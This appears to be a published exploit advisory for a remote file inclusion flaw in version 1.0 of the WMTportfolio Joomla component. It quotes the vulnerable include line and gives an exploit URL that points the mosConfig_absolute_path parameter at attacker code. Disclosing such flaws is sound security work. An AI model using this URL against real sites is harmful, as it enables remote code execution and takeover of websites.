WMTportfolio Joomla Component 1.0 - RFI


[o] wmtportfolio joomla component 1.0 Remote File Include Vulnerability
Software : com_wmtportfolio version 1.0
Download : http://www.webmaster-tips.net/
Author : NoGe


[o] Vulnerable file
administrator/components/com_wmtportfolio/admin.wmtportfolio.php
include( $mosConfig_absolute_path . "/components/com_wmtportfolio/additems.php" );


[o] Exploit
http://localhost/path/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=[evilcode]


[o] Publish
http://milw0rm.com/exploits/4497